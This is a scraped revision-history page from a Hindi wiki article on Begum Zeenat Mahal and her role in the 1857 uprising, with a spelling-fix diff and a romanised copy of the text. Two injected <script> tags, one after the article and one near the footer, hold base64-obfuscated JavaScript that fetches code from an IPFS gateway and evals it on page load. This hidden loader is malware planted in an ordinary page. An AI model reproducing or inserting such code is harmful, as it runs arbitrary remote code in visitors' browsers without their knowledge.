Difference between revisions of "ज़ीनत महल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "मुगल" to "मुग़ल")
m (Text replace - "पैगाम" to "पैग़ाम ")
Line 1: Line 1:
 
[[चित्र:Zeenat-Mahal.jpg|thumb|बेगम ज़ीनत महल<br />Begum Zeenat Mahal]]
 
[[चित्र:Zeenat-Mahal.jpg|thumb|बेगम ज़ीनत महल<br />Begum Zeenat Mahal]]
 
*[[मुग़ल]] सम्राट [[बहादुर शाह ज़फ़र]] की बेगम ज़ीनत महल ने [[दिल्ली]] और आसपास के क्षेत्रों में स्वातंत्र्य योद्धाओं को संगठित किया और देश प्रेम का परिचय दिया।  
 
*[[मुग़ल]] सम्राट [[बहादुर शाह ज़फ़र]] की बेगम ज़ीनत महल ने [[दिल्ली]] और आसपास के क्षेत्रों में स्वातंत्र्य योद्धाओं को संगठित किया और देश प्रेम का परिचय दिया।  
*सन् 1857 की क्रांति में बहादुर शाह ज़फ़र को प्रोत्साहित करने वाली बेगम ज़ीनत महल ने ललकारते हुए कहा था कि- 'यह समय ग़ज़लें कह कर दिल बहलाने का नहीं है, [[बिठूर]] से नाना साहब का पैगाम लेकर देशभक्त सैनिक आए हैं, आज सारे हिन्दुस्तान की आँखें दिल्ली की ओर व आप पर लगी हैं, ख़ानदान-ए-मुग़लिया का ख़ून हिन्द को ग़ुलाम होने देगा तो इतिहास उसे कभी क्षमा नहीं करेगा।' बाद में बेगम ज़ीनत महल भी बहादुर शाह ज़फ़र के साथ ही [[बर्मा]] चली गयीं।  
+
*सन् 1857 की क्रांति में बहादुर शाह ज़फ़र को प्रोत्साहित करने वाली बेगम ज़ीनत महल ने ललकारते हुए कहा था कि- 'यह समय ग़ज़लें कह कर दिल बहलाने का नहीं है, [[बिठूर]] से नाना साहब का पैग़ाम
 +
लेकर देशभक्त सैनिक आए हैं, आज सारे हिन्दुस्तान की आँखें दिल्ली की ओर व आप पर लगी हैं, ख़ानदान-ए-मुग़लिया का ख़ून हिन्द को ग़ुलाम होने देगा तो इतिहास उसे कभी क्षमा नहीं करेगा।' बाद में बेगम ज़ीनत महल भी बहादुर शाह ज़फ़र के साथ ही [[बर्मा]] चली गयीं।  
 
*इसी प्रकार दिल्ली के [[शहज़ादे फ़िरोज़शाह]] की बेगम तुकलाई सुल्तान ज़मानी बेगम को जब दिल्ली में क्रांति की सूचना मिली तो उन्होंने ऐशोआराम का जीवन जीने की बजाय युद्ध शिविरों में रहना पसंद किया और वहीं से सैनिकों को रसद पहुँचाने और घायल सैनिकों की सेवा का प्रबन्ध अपने हाथो में ले लिया।  
 
*इसी प्रकार दिल्ली के [[शहज़ादे फ़िरोज़शाह]] की बेगम तुकलाई सुल्तान ज़मानी बेगम को जब दिल्ली में क्रांति की सूचना मिली तो उन्होंने ऐशोआराम का जीवन जीने की बजाय युद्ध शिविरों में रहना पसंद किया और वहीं से सैनिकों को रसद पहुँचाने और घायल सैनिकों की सेवा का प्रबन्ध अपने हाथो में ले लिया।  
 
*अंग्रेज़ी हुकूमत इनसे इतनी भयभीत हो गयी थी कि कालान्तर में उन्हें घर में नज़रबन्द कर उन पर [[बम्बई]] न छोड़ने और दिल्ली प्रवेश करने पर प्रतिबन्ध लगा दिया गया।
 
*अंग्रेज़ी हुकूमत इनसे इतनी भयभीत हो गयी थी कि कालान्तर में उन्हें घर में नज़रबन्द कर उन पर [[बम्बई]] न छोड़ने और दिल्ली प्रवेश करने पर प्रतिबन्ध लगा दिया गया।

Revision as of 14:24, 1 October 2012

thumb|begam zinat mahal
Begum Zeenat Mahal

  • mugal samrat bahadur shah zafar ki begam zinat mahal ne dilli aur asapas ke kshetroan mean svatantry yoddhaoan ko sangathit kiya aur desh prem ka parichay diya.
  • sanh 1857 ki kraanti mean bahadur shah zafar ko protsahit karane vali begam zinat mahal ne lalakarate hue kaha tha ki- 'yah samay gazalean kah kar dil bahalane ka nahian hai, bithoor se nana sahab ka paigam
lekar deshabhakt sainik ae haian, aj sare hindustan ki aankhean dilli ki or v ap par lagi haian, khanadan-e-mugaliya ka khoon hind ko gulam hone dega to itihas use kabhi kshama nahian karega.' bad mean begam zinat mahal bhi bahadur shah zafar ke sath hi barma chali gayian. 
  • isi prakar dilli ke shahazade firozashah ki begam tukalaee sultan zamani begam ko jab dilli mean kraanti ki soochana mili to unhoanne aishoaram ka jivan jine ki bajay yuddh shiviroan mean rahana pasand kiya aur vahian se sainikoan ko rasad pahuanchane aur ghayal sainikoan ki seva ka prabandh apane hatho mean le liya.
  • aangrezi hukoomat inase itani bhayabhit ho gayi thi ki kalantar mean unhean ghar mean nazaraband kar un par bambee n chho dane aur dilli pravesh karane par pratibandh laga diya gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>